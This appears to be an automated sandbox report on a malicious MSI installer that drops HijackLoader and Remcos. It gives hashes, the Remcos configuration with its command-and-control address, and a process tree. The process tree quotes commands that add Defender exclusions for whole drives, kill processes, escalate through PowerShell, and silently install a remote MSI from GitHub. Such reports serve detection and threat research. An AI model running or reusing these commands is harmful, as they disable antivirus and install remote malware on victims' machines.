Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-11-2024 00:21
Static task
static1
Behavioral task
behavioral1
Sample
LauncherPred8.3.389 stablesetup.msi
Resource
win7-20240729-en
General
-
Target
LauncherPred8.3.389 stablesetup.msi
-
Size
3.1MB
-
MD5
028578212baa7456aae40d4bdb5792e5
-
SHA1
fd9037a16f327a64f8b2fd8ff9f6664ae307ca39
-
SHA256
bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449
-
SHA512
66961e2be5b19aa30c2bb50f7ca502aa8e451299b2f1b5a6b9f3e6c82486e13dd9f18857553e8ff65912ffea9708ed8cab6da704c1bf5bba57944143ca7b1867
-
SSDEEP
49152:muoukMo27Epq0n8Toc4Ur8r6F5mCmR+Ov0Rn0rItYcuwwERO9qZFTvqPvO6Ezvsk:1Yn8ToWo6AvAYcuwr9qrn
Malware Config
Extracted
remcos
v2
185.157.162.126:1995
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
qsdazeazd-EL00KX
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detects HijackLoader (aka IDAT Loader) 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023c87-117.dat family_hijackloader -
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
-
Hijackloader family
-
Remcos family
-
Use of msiexec (install) with remote resource 1 IoCs
pid Process 4432 msiexec.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 17 2348 msiexec.exe 19 2348 msiexec.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 18 raw.githubusercontent.com 19 raw.githubusercontent.com -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation cscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.exe -
pid Process 2288 powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4412 set thread context of 3604 4412 Updwork.exe 128 PID 3316 set thread context of 1424 3316 EHttpSrv.exe 125 PID 1424 set thread context of 4984 1424 cmd.exe 132 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\sev\dev\Firefox Installer.exe msiexec.exe File created C:\Program Files (x86)\sev\dev\ScreenRec_webinstall_all.exe msiexec.exe -
Drops file in Windows directory 21 IoCs
description ioc Process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI7678.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{99CC7D73-9969-490E-93F9-36FE4003EF4F} msiexec.exe File opened for modification C:\Windows\Installer\MSI77F2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB5A7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB616.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57762a.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI77D2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB258.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIB577.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\e57762a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI7783.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIB5D7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7812.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI78BF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB509.tmp msiexec.exe -
Executes dropped EXE 2 IoCs
pid Process 3316 EHttpSrv.exe 4412 Updwork.exe -
Loads dropped DLL 13 IoCs
pid Process 2364 MsiExec.exe 2364 MsiExec.exe 2364 MsiExec.exe 2364 MsiExec.exe 2364 MsiExec.exe 3444 MsiExec.exe 3444 MsiExec.exe 3444 MsiExec.exe 3444 MsiExec.exe 3316 EHttpSrv.exe 3316 EHttpSrv.exe 4412 Updwork.exe 4984 EHttpSrv.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EHttpSrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EHttpSrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Updwork.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023c8c-109.dat nsis_installer_1 behavioral2/files/0x0007000000023c8c-109.dat nsis_installer_2 -
Delays execution with timeout.exe 5 IoCs
pid Process 4816 timeout.exe 2572 timeout.exe 4928 timeout.exe 648 timeout.exe 4100 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 956 taskkill.exe 4564 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 396 msiexec.exe 396 msiexec.exe 2288 powershell.exe 2288 powershell.exe 2348 msiexec.exe 2348 msiexec.exe 3316 EHttpSrv.exe 1424 cmd.exe 1424 cmd.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 3316 EHttpSrv.exe 1424 cmd.exe 1424 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2844 msiexec.exe Token: SeIncreaseQuotaPrivilege 2844 msiexec.exe Token: SeSecurityPrivilege 396 msiexec.exe Token: SeCreateTokenPrivilege 2844 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2844 msiexec.exe Token: SeLockMemoryPrivilege 2844 msiexec.exe Token: SeIncreaseQuotaPrivilege 2844 msiexec.exe Token: SeMachineAccountPrivilege 2844 msiexec.exe Token: SeTcbPrivilege 2844 msiexec.exe Token: SeSecurityPrivilege 2844 msiexec.exe Token: SeTakeOwnershipPrivilege 2844 msiexec.exe Token: SeLoadDriverPrivilege 2844 msiexec.exe Token: SeSystemProfilePrivilege 2844 msiexec.exe Token: SeSystemtimePrivilege 2844 msiexec.exe Token: SeProfSingleProcessPrivilege 2844 msiexec.exe Token: SeIncBasePriorityPrivilege 2844 msiexec.exe Token: SeCreatePagefilePrivilege 2844 msiexec.exe Token: SeCreatePermanentPrivilege 2844 msiexec.exe Token: SeBackupPrivilege 2844 msiexec.exe Token: SeRestorePrivilege 2844 msiexec.exe Token: SeShutdownPrivilege 2844 msiexec.exe Token: SeDebugPrivilege 2844 msiexec.exe Token: SeAuditPrivilege 2844 msiexec.exe Token: SeSystemEnvironmentPrivilege 2844 msiexec.exe Token: SeChangeNotifyPrivilege 2844 msiexec.exe Token: SeRemoteShutdownPrivilege 2844 msiexec.exe Token: SeUndockPrivilege 2844 msiexec.exe Token: SeSyncAgentPrivilege 2844 msiexec.exe Token: SeEnableDelegationPrivilege 2844 msiexec.exe Token: SeManageVolumePrivilege 2844 msiexec.exe Token: SeImpersonatePrivilege 2844 msiexec.exe Token: SeCreateGlobalPrivilege 2844 msiexec.exe Token: SeRestorePrivilege 396 msiexec.exe Token: SeTakeOwnershipPrivilege 396 msiexec.exe Token: SeRestorePrivilege 396 msiexec.exe Token: SeTakeOwnershipPrivilege 396 msiexec.exe Token: SeRestorePrivilege 396 msiexec.exe Token: SeTakeOwnershipPrivilege 396 msiexec.exe Token: SeRestorePrivilege 396 msiexec.exe Token: SeTakeOwnershipPrivilege 396 msiexec.exe Token: SeRestorePrivilege 396 msiexec.exe Token: SeTakeOwnershipPrivilege 396 msiexec.exe Token: SeRestorePrivilege 396 msiexec.exe Token: SeTakeOwnershipPrivilege 396 msiexec.exe Token: SeRestorePrivilege 396 msiexec.exe Token: SeTakeOwnershipPrivilege 396 msiexec.exe Token: SeRestorePrivilege 396 msiexec.exe Token: SeTakeOwnershipPrivilege 396 msiexec.exe Token: SeRestorePrivilege 396 msiexec.exe Token: SeTakeOwnershipPrivilege 396 msiexec.exe Token: SeDebugPrivilege 2288 powershell.exe Token: SeIncreaseQuotaPrivilege 960 WMIC.exe Token: SeSecurityPrivilege 960 WMIC.exe Token: SeTakeOwnershipPrivilege 960 WMIC.exe Token: SeLoadDriverPrivilege 960 WMIC.exe Token: SeSystemProfilePrivilege 960 WMIC.exe Token: SeSystemtimePrivilege 960 WMIC.exe Token: SeProfSingleProcessPrivilege 960 WMIC.exe Token: SeIncBasePriorityPrivilege 960 WMIC.exe Token: SeCreatePagefilePrivilege 960 WMIC.exe Token: SeBackupPrivilege 960 WMIC.exe Token: SeRestorePrivilege 960 WMIC.exe Token: SeShutdownPrivilege 960 WMIC.exe Token: SeDebugPrivilege 960 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2844 msiexec.exe 2844 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 396 wrote to memory of 2364 396 msiexec.exe 84 PID 396 wrote to memory of 2364 396 msiexec.exe 84 PID 396 wrote to memory of 2364 396 msiexec.exe 84 PID 396 wrote to memory of 2316 396 msiexec.exe 85 PID 396 wrote to memory of 2316 396 msiexec.exe 85 PID 2316 wrote to memory of 2668 2316 cmd.exe 87 PID 2316 wrote to memory of 2668 2316 cmd.exe 87 PID 2316 wrote to memory of 2572 2316 cmd.exe 88 PID 2316 wrote to memory of 2572 2316 cmd.exe 88 PID 2316 wrote to memory of 4928 2316 cmd.exe 89 PID 2316 wrote to memory of 4928 2316 cmd.exe 89 PID 2316 wrote to memory of 648 2316 cmd.exe 90 PID 2316 wrote to memory of 648 2316 cmd.exe 90 PID 2316 wrote to memory of 4100 2316 cmd.exe 91 PID 2316 wrote to memory of 4100 2316 cmd.exe 91 PID 2316 wrote to memory of 228 2316 cmd.exe 92 PID 2316 wrote to memory of 228 2316 cmd.exe 92 PID 228 wrote to memory of 2288 228 cscript.exe 93 PID 228 wrote to memory of 2288 228 cscript.exe 93 PID 2316 wrote to memory of 4816 2316 cmd.exe 95 PID 2316 wrote to memory of 4816 2316 cmd.exe 95 PID 2288 wrote to memory of 1728 2288 powershell.exe 96 PID 2288 wrote to memory of 1728 2288 powershell.exe 96 PID 1728 wrote to memory of 5068 1728 wscript.exe 97 PID 1728 wrote to memory of 5068 1728 wscript.exe 97 PID 5068 wrote to memory of 960 5068 cmd.exe 99 PID 5068 wrote to memory of 960 5068 cmd.exe 99 PID 1728 wrote to memory of 2292 1728 wscript.exe 101 PID 1728 wrote to memory of 2292 1728 wscript.exe 101 PID 2292 wrote to memory of 5052 2292 cmd.exe 105 PID 2292 wrote to memory of 5052 2292 cmd.exe 105 PID 1728 wrote to memory of 1464 1728 wscript.exe 106 PID 1728 wrote to memory of 1464 1728 wscript.exe 106 PID 1464 wrote to memory of 956 1464 cmd.exe 108 PID 1464 wrote to memory of 956 1464 cmd.exe 108 PID 1728 wrote to memory of 3332 1728 wscript.exe 110 PID 1728 wrote to memory of 3332 1728 wscript.exe 110 PID 3332 wrote to memory of 4564 3332 cmd.exe 112 PID 3332 wrote to memory of 4564 3332 cmd.exe 112 PID 1728 wrote to memory of 3692 1728 wscript.exe 113 PID 1728 wrote to memory of 3692 1728 wscript.exe 113 PID 1728 wrote to memory of 508 1728 wscript.exe 115 PID 1728 wrote to memory of 508 1728 wscript.exe 115 PID 508 wrote to memory of 4432 508 wscript.exe 118 PID 508 wrote to memory of 4432 508 wscript.exe 118 PID 2348 wrote to memory of 3444 2348 msiexec.exe 122 PID 2348 wrote to memory of 3444 2348 msiexec.exe 122 PID 2348 wrote to memory of 3444 2348 msiexec.exe 122 PID 2348 wrote to memory of 3316 2348 msiexec.exe 123 PID 2348 wrote to memory of 3316 2348 msiexec.exe 123 PID 2348 wrote to memory of 3316 2348 msiexec.exe 123 PID 2348 wrote to memory of 4412 2348 msiexec.exe 124 PID 2348 wrote to memory of 4412 2348 msiexec.exe 124 PID 2348 wrote to memory of 4412 2348 msiexec.exe 124 PID 3316 wrote to memory of 1424 3316 EHttpSrv.exe 125 PID 3316 wrote to memory of 1424 3316 EHttpSrv.exe 125 PID 3316 wrote to memory of 1424 3316 EHttpSrv.exe 125 PID 4412 wrote to memory of 3604 4412 Updwork.exe 128 PID 4412 wrote to memory of 3604 4412 Updwork.exe 128 PID 4412 wrote to memory of 3604 4412 Updwork.exe 128 PID 4412 wrote to memory of 3604 4412 Updwork.exe 128 PID 4412 wrote to memory of 3604 4412 Updwork.exe 128 PID 3316 wrote to memory of 1424 3316 EHttpSrv.exe 125 PID 1424 wrote to memory of 4984 1424 cmd.exe 132
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\LauncherPred8.3.389 stablesetup.msi"1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2844
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9A5EF906921ABD9D7DC28393C227598B2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\updt\lola.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2668
-
-
C:\Windows\system32\timeout.exetimeout /t 2 /nobreak3⤵
- Delays execution with timeout.exe
PID:2572
-
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak3⤵
- Delays execution with timeout.exe
PID:4928
-
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak3⤵
- Delays execution with timeout.exe
PID:648
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak3⤵
- Delays execution with timeout.exe
PID:4100
-
-
C:\Windows\system32\cscript.execscript //nologo "C:\Users\Admin\AppData\Local\Temp\updt\runTaskAsAdmin.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process wscript.exe -ArgumentList '""C:\Users\Admin\AppData\Local\Temp\updt\task.vbs""' -Verb runAs"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\updt\task.vbs5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"6⤵
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\System32\Wbem\WMIC.exeWmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"7⤵
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"6⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\System32\Wbem\WMIC.exeWmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"7⤵PID:5052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im cmd.exe6⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\system32\taskkill.exetaskkill /f /im cmd.exe7⤵
- Kills process with taskkill
PID:956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im msiexec.exe6⤵
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\system32\taskkill.exetaskkill /f /im msiexec.exe7⤵
- Kills process with taskkill
PID:4564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Script started >> "C:\Users\root\Desktop\wix\log.txt"6⤵PID:3692
-
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\updt\secondaryTask.vbs" /b6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:508 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn7⤵
- Use of msiexec (install) with remote resource
PID:4432
-
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 60 /nobreak3⤵
- Delays execution with timeout.exe
PID:4816
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 24E51D8ABC907854D5403ED7F31F0E082⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3444
-
-
C:\Users\Admin\AppData\Local\Temp\EHttpSrv.exe"C:\Users\Admin\AppData\Local\Temp\EHttpSrv.exe"2⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Users\Admin\AppData\Local\Temp\EHttpSrv.exeC:\Users\Admin\AppData\Local\Temp\EHttpSrv.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Updwork.exe"C:\Users\Admin\AppData\Local\Temp\Updwork.exe"2⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\SysWOW64\WerFault.exe"C:\Windows\System32\WerFault.exe"3⤵PID:3604
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}1⤵
- System Location Discovery: System Language Discovery
PID:2104
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5cfcf04f59a2a4b21b84aaac293c3d269
SHA176574a32b8c2ca79f8d780f060a71cbf4b5bea16
SHA256289de5cd99e5cc20dcdb2a97d187878de26f1ead56a0a8788d3626c851cd4145
SHA512c0a1925f1761b0f49ba21d6c87f9efa680ee9710cb69ac41bcea1a727f19bd92341262a53ac1715d9f7c53e795de09b2557191fd28babc0e8179f967a000e768
-
Filesize
2KB
MD519c27dfadaca4210b96721b05b6befa8
SHA10febacb19d05184893872e8f9471c90d1821ccfe
SHA256754fb2a0822a6bb001dce0d5a741b7677445e93139d4b602c17145f8af5314e3
SHA51243a80c262e1374c2d70714c948c3246b940aafe13ee94a0b9ab386f2e7aa2ceed771f7e144f7d62832803f879ca177013102154b08f8349948a25c499b6e4a3c
-
Filesize
1.0MB
MD56e2c390c953a311e1e115447b0a9cd6c
SHA1a2afd7bb3f6a99004e3477b78c6f2070633895ef
SHA256afb1cf299df4f88d4e1bd21e070e3b409bbb00da5f10837d56b7165795548527
SHA5125f51d00d135b80522343ea4799d98ab2ae1d0459fc11ad49cec763568c403caaf34f1949921b7a838f7d780eb34d8f3b445d47e48fa88228f697e8b97f6b7095
-
Filesize
20KB
MD59329ba45c8b97485926a171e34c2abb8
SHA120118bc0432b4e8b3660a4b038b20ca28f721e5c
SHA256effa6fcb8759375b4089ccf61202a5c63243f4102872e64e3eb0a1bdc2727659
SHA5120af06b5495142ba0632a46be0778a7bd3d507e9848b3159436aa504536919abbcacd8b740ef4b591296e86604b49e0642fee2c273a45e44b41a80f91a1d52acc
-
Filesize
1.0MB
MD5686b224b4987c22b153fbb545fee9657
SHA1684ee9f018fbb0bbf6ffa590f3782ba49d5d096c
SHA256a2ac851f35066c2f13a7452b7a9a3fee05bfb42907ae77a6b85b212a2227fc36
SHA51244d65db91ceea351d2b6217eaa27358dbc2ed27c9a83d226b59aecb336a9252b60aec5ce5e646706a2af5631d5ee0f721231ec751e97e47bbbc32d5f40908875
-
Filesize
48KB
MD505f9343bfa64e397c4c7eba9cd5bc601
SHA1baddf873496b9218e73e112b5125b3271b3f6357
SHA25684ebf4b0a8594bdbbdae186a846e9fb2e5b2ecce4b6a35c4d3065ed2bdcecfb7
SHA512f5078c32184078af0ee1cb8830f26aa77f1dd5d9498fdd3b8f861fc4b54f085fd060902fd423fd68dc0eb82973000137b20e3db7ddf9e7cb2ade4fbc97625f0b
-
Filesize
363KB
MD53ca940e27e87443f7891d39536650f9b
SHA12603ff220c43f13591a51abb0cf339aecb758207
SHA256a91f13aece1ea7ebe326f0e340bda9d00613d3365cd81b7f138a4c9446ffbd38
SHA5120c0e04cbb8247f6dfe0790d1c3453596e3cb5f5ff0d2c3bc4e01fb38ad8e042322130072263c135c5637a745ef70ac68487bdade3510990ce8f609cad46566ee
-
Filesize
494KB
MD5253c52411b256e4af301cba58dcb6cef
SHA1f21252c959b9eb47cd210f41b997cf598612d7c9
SHA2567d57b704dd881413e7ee2effb3d85bdfff1e208b0f3f745419e640930d9d339d
SHA51240de728edae55f97ac9459cf78bbc31b38e8b59bdb7a74fbd9e09d7efd2a81b1dc5fd8011007c66efb58e850f1c57d099ec340aecd62911d6aebf2e70d1275d0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
877KB
MD55124236fd955464317fbb1f344a1d2f2
SHA1fe3a91e252f1dc3c3b4980ade7157369ea6f5097
SHA256ed1389002cdf96c9b54de35b6e972166ee3296d628943fd594a383e674c5cba6
SHA5122b2ac23244b16f936ef9a4049586f58c809fcc4391a56390cc5db2e8d96140001e0b977680ed1d8b0ab9c410e865a880209e22add8d42e563dc40bc91236b252
-
Filesize
883KB
MD54366cd6c5d795811822b9ccc3df3eab4
SHA130f6050729b4c08b7657454cb79dd5a3d463c606
SHA25655497a3eced5d8d190400bcd1a4b43a304ebf74a0d6d098665474ed4b1b0e9da
SHA5124a56a2da7ded16125c2795d5760c7c08a93362536c9212cff3a31dbf6613cb3fca436efd77c256338f5134da955bc7ccc564b4af0c45ac0dfd645460b922a349
-
Filesize
1B
MD57694f4a66316e53c8cdd9d9954bd611d
SHA122ea1c649c82946aa6e479e1ffd321e4a318b1b0
SHA2568e35c2cd3bf6641bdb0e2050b76932cbb2e6034a0ddacc1d9bea82a6ba57f7cf
SHA5122e96772232487fb3a058d58f2c310023e07e4017c94d56cc5fae4b54b44605f42a75b0b1f358991f8c6cbe9b68b64e5b2a09d0ad23fcac07ee9a9198a745e1d5
-
Filesize
1KB
MD54e5e270b5b37fffcf5ff34ddfd3ccad7
SHA18293764715345aa9bd3112f0f7a0b803c9fdc5af
SHA25621b802db9fe353cb25f8f9c0a9614d021f4b5ea9c8e8d4c470eb2ebe5a206efb
SHA512f0e32f413f48afe8ba321f7e035b0d754b387fd729e60774d06d7de46f756cc56432f6b861488aef6aa63a60590824962cdc994ba90bc89a44b585df2c23ed4c
-
Filesize
659B
MD594d85f8f350a1f6fe8e700b87f5b4eea
SHA10dc9e11c55b3e056eeadb9cfe6ef2b6bd98300ea
SHA256cb7294f1c425ad49aa0e487d36cfb580c303db25d1f69ea3fa08d81d29fc21ba
SHA5120226c2662e4d6d2f473f075e8d200d55a3b18deacb40365450866039dafeb206ed6ea9216149d1ac5f1a19e8f185381b796d7f4fa3bb08c4558b6b292838e9c5
-
Filesize
876B
MD5183d51767fe58e2bd256688315d25709
SHA12c0f959b61081a10a085ad8e8f8741a69e2d9934
SHA25623723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
